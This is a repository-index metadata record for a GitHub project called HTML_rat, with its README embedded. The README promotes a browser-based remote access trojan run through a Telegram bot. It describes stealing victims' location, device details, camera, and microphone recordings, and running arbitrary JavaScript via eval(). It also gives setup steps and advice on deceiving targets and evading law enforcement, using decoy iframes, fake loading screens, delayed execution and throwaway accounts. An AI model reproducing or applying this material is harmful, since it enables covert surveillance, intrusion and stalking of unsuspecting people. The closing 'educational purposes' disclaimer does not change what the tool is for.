{"id":26410640,"url":"https://github.com/mr-r0ot/html_rat","last_synced_at":"2026-01-03T08:34:01.103Z","repository":{"id":278557395,"uuid":"936019228","full_name":"mr-r0ot/HTML_rat","owner":"mr-r0ot","description":"Best and First Html Rat(control with telegtam)","archived":false,"fork":false,"pushed_at":"2025-02-20T11:59:35.000Z","size":0,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-02-20T12:34:11.567Z","etag":null,"topics":["hacking","rat","telegram-bot","telegram-rat"],"latest_commit_sha":null,"homepage":"","language":"HTML","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mr-r0ot.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-02-20T11:56:19.000Z","updated_at":"2025-02-20T12:00:35.000Z","dependencies_parsed_at":"2025-02-20T12:45:48.452Z","dependency_job_id":null,"html_url":"https://github.com/mr-r0ot/HTML_rat","commit_stats":null,"previous_names":["mr-r0ot/html_rat"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mr-r0ot%2FHTML_rat","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mr-r0ot%2FHTML_rat/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mr-r0ot%2FHTML_rat/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mr-r0ot%2FHTML_rat/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mr-r0ot","download_url":"https://codeload.github.com/mr-r0ot/HTML_rat/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":244102841,"owners_count":20398386,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["hacking","rat","telegram-bot","telegram-rat"],"created_at":"2025-03-17T20:18:54.447Z","updated_at":"2026-01-03T08:34:01.098Z","avatar_url":"https://github.com/mr-r0ot.png","language":"HTML","funding_links":[],"categories":[],"sub_categories":[],"readme":"# 💀 HTML Rat: The Ultimate Stealth Remote Access Tool\n\n**HTML Rat** is your key to owning any device with just a single HTML file and a Telegram bot. No servers, no traces, pure domination. This is the tool every black-hat hacker dreams of—silent, deadly, and impossible to resist.\n\n---\n\n## Features: Why HTML Rat is Unstoppable\n\n- 📡 **Remote Code Execution (RCE)**: Run any JavaScript on the target’s device like you’re sitting at their keyboard.\n- 🌍 **GPS Tracking**: Pinpoint their exact location, down to the street.\n- 📸 **Covert Camera Access**: Snap photos or record videos without them knowing.\n- 🎤 **Mic Snooping**: Capture every sound in their environment.\n- 📊 **Device Fingerprinting**: Harvest everything—IP, browser, battery level, hardware specs, you name it.\n- 🛠️ **Slick Telegram Control Panel**: Command your army of compromised devices from a single Telegram bot.\n\nThis isn’t just a tool—it’s a weapon for total control.\n\n---\n\n## How It Works: The Technical Black Magic\n\n### Core Architecture\n\n- **HTML File**: The heart of the beast. A single HTML file embeds stealthy JavaScript that activates the moment a victim opens it in their browser.\n- **Telegram Bot**: Your command center. All instructions flow through Telegram’s API, and results come back to you instantly.\n- **Serverless Stealth**: No need for a dedicated server—everything runs through Telegram’s API, leaving no footprints.\n\n### Workflow Breakdown\n\n1. **Client Registration**:\n\n - When the victim loads the HTML file, the embedded JavaScript springs into action.\n - The target’s public IP is grabbed via an external API (`https://api.ipify.org`).\n - A detailed device profile is collected, including:\n - **User Agent**: Browser and OS details via `navigator.userAgent`.\n - **Screen Resolution**: `window.screen.width` × `window.screen.height`.\n - **Language**: `navigator.language`.\n - **Hardware**: CPU cores (`navigator.hardwareConcurrency`), memory, and more.\n - This data is sent to your Telegram bot as a notification and compiled into an `info.html` file, uploaded for your viewing pleasure.\n\n2. **Command Processing**:\n\n - The script polls Telegram’s API using `getUpdates` every few seconds to check for your commands.\n - Send `/panel` to your bot to see a list of all compromised devices, each marked with their IP and online status.\n - Select a device to access a menu with options like executing code, snapping photos, or grabbing GPS data.\n\n3. **Remote Code Execution (RCE)**:\n\n - In \"Run JS\" mode, send any JavaScript code through Telegram (e.g., `alert(\"Owned!\")` or something nastier).\n - The script uses `eval()` to execute it directly on the victim’s device.\n - Results (or errors) are sent back to your bot as text or files.\n\n4. **Hardware Access**:\n\n - **Camera and Mic**: The `navigator.mediaDevices.getUserMedia` API captures photos, videos, or audio streams silently.\n - **GPS**: `navigator.geolocation.getCurrentPosition` fetches precise coordinates. If denied, it falls back to IP-based geolocation using `https://ipapi.co/json`.\n - Captured media or coordinates are sent to your bot as files or text.\n\n5. **Update Loop**:\n\n - The script runs a `setInterval` loop (every 2 seconds by default) to poll for new Telegram messages, ensuring real-time control.\n - Old updates are flushed to keep the connection clean and avoid rate limits.\n\n### Technical Deep Dive\n\n- **Telegram API**: Uses `sendMessage`, `sendPhoto`, `sendDocument`, and `getUpdates` via `fetch` for seamless communication.\n- **Error Handling**: If the victim denies camera or GPS access, the script reports \"Access Denied\" to your bot.\n- **Optimization**: Polling is used for simplicity, but you could swap to Webhooks for faster response times (not implemented here).\n\n---\n\n## Setup: Unleash the Beast\n\n### Step 1: Create Your Telegram Bot\n\n1. Open Telegram and message **@BotFather**.\n2. Send `/newbot`, choose a name, and grab the bot token.\n3. Keep that token safe—it’s your key to the kingdom.\n\n### Step 2: Configure HTML Rat\n\n1. Open `index.html` in a text editor.\n\n2. Find this line:\n\n ```javascript\n const BOT_TOKEN = 'YOUR TELEGRAM BOT TOKEN';\n ```\n\n Replace `'YOUR TELEGRAM BOT TOKEN'` with your bot’s token.\n\n3. Find your Telegram user ID:\n\n - Message **@userinfobot** and send `/start`.\n - Copy the numeric ID it gives you.\n\n4. In `index.html`, locate:\n\n ```javascript\n const ADMIN_CHAT_ID = 59539XXXXX;\n ```\n\n Replace `59539XXXXX` with your numeric ID.\n\n### Step 3: Deploy the Trap\n\n- Host the `index.html` file on an HTTPS server (e.g., GitHub Pages, Netlify). HTTPS is mandatory for camera and mic access.\n- Trick the target into opening the file in their browser. Once they do, they’re yours.\n\n---\n\n## Usage: Own the Target\n\n- When a victim opens the HTML file, your bot pings you with their details.\n- Commands:\n - `/panel`: Lists all connected devices.\n - **Show info**: Dumps a full device profile.\n - **Run JS**: Executes your JavaScript code.\n - **Get GPS**: Tracks their location.\n - **Take Photo**: Snaps a covert picture.\n - **Record Video**: Grabs a 10-second video.\n - **Record Audio**: Captures ambient sound.\n\n---\n\n## Security \u0026 Stealth Tips\n\n- **Browser Permissions**: Most browsers (Chrome, Firefox, etc.) require user consent for camera, mic, or GPS access. This could tip off a suspicious target.\n- **Cover Your Tracks**: The bot token and your Telegram ID can be traced by law enforcement. **Never use your personal account.** Create a throwaway Telegram account and delete the bot token after your operation to stay ghosted.\n\n---\n\n## Customization: Keep the Target Clueless\n\nTo make the HTML file look legit and avoid suspicion, tweak its appearance in `index.html`:\n\n- **Embed an iframe**: Display a real website to distract the target:\n\n ```html\n \u003ciframe src=\"https://example.com\" style=\"width:100%; height:100%; border:none;\"\u003e\u003c/iframe\u003e\n ```\n\n- **Fake Loading Screen**: Make it look like a legit page is loading:\n\n ```html\n \u003cdiv style=\"text-align:center; padding:50px;\"\u003e\n \u003ch2\u003eLoading...\u003c/h2\u003e\n \u003cp\u003ePlease wait, content is being fetched.\u003c/p\u003e\n \u003c/div\u003e\n ```\n\n- **Delay Execution**: Add a delay to the script to keep the target engaged:\n\n ```javascript\n setTimeout(async () =\u003e {\n await registerClient();\n await flushUpdates();\n setInterval(handleUpdates, 2000);\n }, 10000); // 10-second delay\n ```\n\nThese tricks buy you time while the script works its magic in the background.\n\n---\n\n## Why HTML Rat?\n\n- **Stealth Mode**: No server, just a single HTML file.\n- **Universal**: Works on any device with a browser.\n- **Unlimited Power**: Full hardware and data access.\n- **Dead Simple**: Controlled entirely from Telegram.\n\n---\n\n## Disclaimer\n\nThis tool is for educational purposes only. Unauthorized use is illegal and unethical. You’re on your own if you cross the line.\n\n---\n\n**Fully created by GitHub.com/mr-r0ot.**\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmr-r0ot%2Fhtml_rat","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmr-r0ot%2Fhtml_rat","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmr-r0ot%2Fhtml_rat/lists"}